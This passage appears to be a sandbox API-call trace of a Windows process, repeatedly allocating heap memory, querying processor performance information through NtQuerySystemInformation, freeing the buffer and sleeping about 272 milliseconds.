[0234.055] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.055] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.056] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.056] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.056] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.057] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.057] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.057] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.057] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.057] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.058] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.058] Sleep (dwMilliseconds=0x110) [0234.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.060] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.066] Sleep (dwMilliseconds=0x110) [0234.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.084] Sleep (dwMilliseconds=0x110) [0234.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.091] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.093] Sleep (dwMilliseconds=0x110) [0234.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.113] Sleep (dwMilliseconds=0x110) [0234.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.131] Sleep (dwMilliseconds=0x110) [0234.147] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.147] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.147] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.148] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.148] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.148] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.151] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.151] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.152] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.152] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.152] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.153] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.153] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.156] Sleep (dwMilliseconds=0x110) [0234.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.193] Sleep (dwMilliseconds=0x110) [0234.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.205] Sleep (dwMilliseconds=0x110) [0234.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.223] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.224] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.224] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.225] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.225] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.225] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.226] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.226] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.227] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.227] Sleep (dwMilliseconds=0x110) [0234.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.240] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.240] Sleep (dwMilliseconds=0x110) [0234.247] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.247] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.254] Sleep (dwMilliseconds=0x110) [0234.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.268] Sleep (dwMilliseconds=0x110) [0234.278] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.278] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.279] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.279] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.281] Sleep (dwMilliseconds=0x110) [0234.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, 